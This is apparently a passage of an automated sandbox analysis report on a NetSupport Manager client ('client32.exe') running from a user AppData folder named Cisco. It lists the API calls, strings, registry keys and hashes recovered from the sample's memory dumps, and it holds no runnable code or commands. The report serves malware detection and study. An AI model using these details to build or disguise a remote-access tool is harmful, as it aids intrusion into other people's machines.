                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11025A49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                        • API String ID: 4186647306-532032230
                                                                                                                                        • Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                        • Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
                                                                                                                                        • Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                        • Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                        • CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                        • CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                        • API String ID: 3360349984-1136101629
                                                                                                                                        • Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                        • Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
                                                                                                                                        • Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                        • Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf
                                                                                                                                        • String ID: %s%s%s.bin$305090$_HF$_HW$_SW
                                                                                                                                        • API String ID: 2111968516-1635371599
                                                                                                                                        • Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                        • Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
                                                                                                                                        • Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                        • Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906950
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                          • Part of subcall function 688FA4E0: EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,688FDA7F,?,00000000), ref: 688FA503
                                                                                                                                          • Part of subcall function 688FA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 688FA568
                                                                                                                                          • Part of subcall function 688FA4E0: Sleep.KERNEL32(00000000,?,688FDA7F,?,00000000), ref: 688FA581
                                                                                                                                          • Part of subcall function 688FA4E0: LeaveCriticalSection.KERNEL32(6893B898,00000000), ref: 688FA5B3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                                        • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                                                        • API String ID: 1112461860-1140593649
                                                                                                                                        • Opcode ID: 08bca1ca36bdea48a3b11b5675b8837051d1f0f6a9efdcee20d3f25514c7b514
                                                                                                                                        • Instruction ID: 4ddac414980ff260e0b700ca86cac390e99b8bf73fb146fe4edb6e38ccc1be31
                                                                                                                                        • Opcode Fuzzy Hash: 08bca1ca36bdea48a3b11b5675b8837051d1f0f6a9efdcee20d3f25514c7b514
                                                                                                                                        • Instruction Fuzzy Hash: 1C51B075A0C7259FEB32DEBCD840B6E77A8AB8630CF90052DD961D3281DB31E585CB91
                                                                                                                                        APIs
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
                                                                                                                                        • GetStockObject.GDI32(00000004), ref: 110FFD6B
                                                                                                                                        • RegisterClassA.USER32(?), ref: 110FFD7F
                                                                                                                                        • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                        • String ID: NSMDesktopWnd
                                                                                                                                        • API String ID: 2669163067-206650970
                                                                                                                                        • Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                        • Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
                                                                                                                                        • Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                        • Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95
                                                                                                                                        APIs
                                                                                                                                        • KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
                                                                                                                                        • KillTimer.USER32(00000000,00007F46,TermUI...), ref: 111393C3
                                                                                                                                        • FreeLibrary.KERNEL32(763B0000,?,TermUI...), ref: 1113943B
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeKillLibraryTimer
                                                                                                                                        • String ID: TermUI
                                                                                                                                        • API String ID: 2006562601-4085834059
                                                                                                                                        • Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                        • Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
                                                                                                                                        • Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                        • Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                        • API String ID: 47109696-3245241687
                                                                                                                                        • Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                        • Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
                                                                                                                                        • Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                        • Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                          • Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                                          • Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 1110E508
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                        • API String ID: 806825551-1858614750
                                                                                                                                        • Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                        • Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
                                                                                                                                        • Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                        • Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101755C
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                        • CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                        • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                        • API String ID: 2994556011-578995875
                                                                                                                                        • Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                        • Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
                                                                                                                                        • Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                        • Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                          • Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
                                                                                                                                        • ResetEvent.KERNEL32(00000250), ref: 111408D9
                                                                                                                                        • SetEvent.KERNEL32(00000250), ref: 111408EF
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                        • String ID: MiniDump
                                                                                                                                        • API String ID: 1494854734-2840755058
                                                                                                                                        • Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                        • Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
                                                                                                                                        • Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                        • Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017472
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                        • CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                        • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                        • API String ID: 2994556011-2037925671
                                                                                                                                        • Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                        • Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
                                                                                                                                        • Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                        • Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 688F5014
                                                                                                                                          • Part of subcall function 688F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F5034
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 688F8EAE
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 688F8EBF
                                                                                                                                          • Part of subcall function 688F2420: _strrchr.LIBCMT ref: 688F242E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                                                        • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                                        • API String ID: 3215810784-3459472706
                                                                                                                                        • Opcode ID: 8b57d419eb0cbf1a727b1cb863b4fe23109896a653439d9c26a4029edee13bc7
                                                                                                                                        • Instruction ID: 41edc5693f704a5ed8d687928cf7593a3ba6ce8f62e49b437a8f8cc93e8f127a
                                                                                                                                        • Opcode Fuzzy Hash: 8b57d419eb0cbf1a727b1cb863b4fe23109896a653439d9c26a4029edee13bc7
                                                                                                                                        • Instruction Fuzzy Hash: D511C875A841299FEF208A55DC41BFE7364EF45385F800875EE19A3240EB70DA45CF61
                                                                                                                                        APIs
                                                                                                                                        • LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
                                                                                                                                        • wsprintfA.USER32 ref: 11143416
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                        • API String ID: 1985783259-2296142801
                                                                                                                                        • Opcode ID: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                                        • Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
                                                                                                                                        • Opcode Fuzzy Hash: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                                        • Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 11031376
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                        • String ID: %s%s.bin$305090$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                        • API String ID: 4180936305-1644303538
                                                                                                                                        • Opcode ID: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                                        • Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
                                                                                                                                        • Opcode Fuzzy Hash: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                                        • Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
                                                                                                                                        • __strdup.LIBCMT ref: 11140D17
                                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                          • Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E
                                                                                                                                        • _free.LIBCMT ref: 11140D4C
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 398584587-0
                                                                                                                                        APIs
                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2
                                                                                                                                          • Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006
                                                                                                                                        • _free.LIBCMT ref: 1100ECB4
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • _free.LIBCMT ref: 1100ECC7
                                                                                                                                        • _free.LIBCMT ref: 1100ECDA
                                                                                                                                        • _free.LIBCMT ref: 1100ECED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3515823920-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                        • wsprintfA.USER32 ref: 11141FAE
                                                                                                                                        • wsprintfA.USER32 ref: 11141FC4
                                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76938400,?), ref: 1113F937
                                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                          • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                        • API String ID: 3779116287-2600120591
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76938400,?), ref: 1113F937
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile$CloseHandle
                                                                                                                                        • String ID: "
                                                                                                                                        • API String ID: 1443461169-123907689
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68909BF0: _strncpy.LIBCMT ref: 68909C14
                                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 688F6691
                                                                                                                                        • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 688F66A2
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 688F66CD
                                                                                                                                        Strings
                                                                                                                                        • Cannot resolve hostname %s, error %d, xrefs: 688F66D6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_strncpygethostbynameinet_addr
                                                                                                                                        • String ID: Cannot resolve hostname %s, error %d
                                                                                                                                        • API String ID: 2603238076-1802540647
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,A0A8B03E,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                        • CreateEventA.KERNEL32 ref: 1102CD8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$Create$__wcstoi64_memsetwsprintf
                                                                                                                                        • String ID: Client$DisableGeolocation
                                                                                                                                        • API String ID: 2598271332-4166767992
                                                                                                                                        APIs
                                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A
                                                                                                                                          • Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,7694A1D0,76933760,76937A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
                                                                                                                                          • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
                                                                                                                                          • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
                                                                                                                                          • Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34
                                                                                                                                        • TranslateMessage.USER32(?), ref: 11026E60
